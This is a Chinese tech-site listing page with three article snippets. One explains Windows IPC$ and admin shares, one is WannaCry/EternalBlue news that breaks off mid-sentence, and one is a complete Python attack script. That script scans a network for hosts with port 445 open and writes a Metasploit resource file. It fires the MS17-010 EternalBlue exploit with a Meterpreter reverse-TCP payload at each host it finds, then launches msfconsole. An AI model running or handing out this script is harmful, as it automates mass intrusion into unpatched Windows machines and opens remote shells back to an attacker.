首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

    IPC$ (Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT2000在提供了 IPC$ 共享功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(C$、D$、E$……)和系统目录共享(Admin$)。所有的这些初衷都是为了方便管理员的管理。但好的初衷并不一定有好的收效,一些别有用心者会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测。

    05

    python Metasploit攻击445端口

    """ Created on Sun Nov 12 09:11:33 2018 @author: 小谢 """ import os import optparse import sys import nmap def findTarget(Hosts): #扫描网段范围内开放445端口的主机 nmScan=nmap.PortScanner() nmScan.scan(Hosts,'445') targets=[] for t in nmScan.all_hosts(): if nmScan[t].has_tcp(445): #如果445端口提供了协议 state=nmScan[t]['tcp'][445]['state'] #查看445端口的状态 if state=='open': print '[+]Found Target Host:'+t targets.append(t) return targets #返回开放445端口的主机列表 def confickerExploit(configFile,target,lhost): #漏洞利用 configFile.write('use exploit/windows/smb/ms17_010_eternalblue \n') #漏洞利用代码 configFile.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp\n') configFile.write('set RHOST '+str(target)+'\n') #设定参数 configFile.write('set LHOST '+lhost+'\n') configFile.write('exploit -j -z\n') #j选项是将所有连接的会话保持在后台 -z不与任务进行即时交换 def main(): configFile=open('configure.rc','w') #以写入方式打开配置文件 usage='[-]Usage %prog -H <RHOSTS> -l/-L <LHOST> ' parser=optparse.OptionParser(usage) parser.add_option('-H',dest='target',type='string',help='target host') #目标主机 parser.add_option('-l','-L',dest='lhost',type='string',help='listen address') #我们的主机 (options,args)=parser.parse_args() target=options.target lhost=options.lhost if (target==None)|(lhost==None): print parser.usage exit(0) targets=findTarget(options.target) #寻找目标 for target in targets: #逐个攻击 confickerExploit(configFile,target,lhost) configFile.close() os.system('msfconsole -r configure.rc') #启动metasploit并读取配置文件 if name=='main': main()

    01

    "永恒之蓝"勒索病毒凶猛 周一上班请用正确姿势打开电脑

    一、概述   这个周末,对于网络安全圈来说可以用“血雨腥风”来形容。北京时间5月12日开始,全球范围内爆发了基于Windows网络共享协议进行攻击传播的“永恒之蓝”勒索病毒。截止发稿时为止,包括美国、俄罗斯以及整个欧洲在内的100多个国家,及国内众多大型企事业单位内网和政府机构专网中招,电脑磁盘上的文件被加密,用户被勒索支付高额赎金才能解密恢复文件。由于病毒使用的是高强度的RSA和AES加密算法,目前还无法破解。换句话说,用户一旦中招,基本无解。   鉴于病毒还在全面传播,如暂时无法进行系统处置,内网用户应

    010
    领券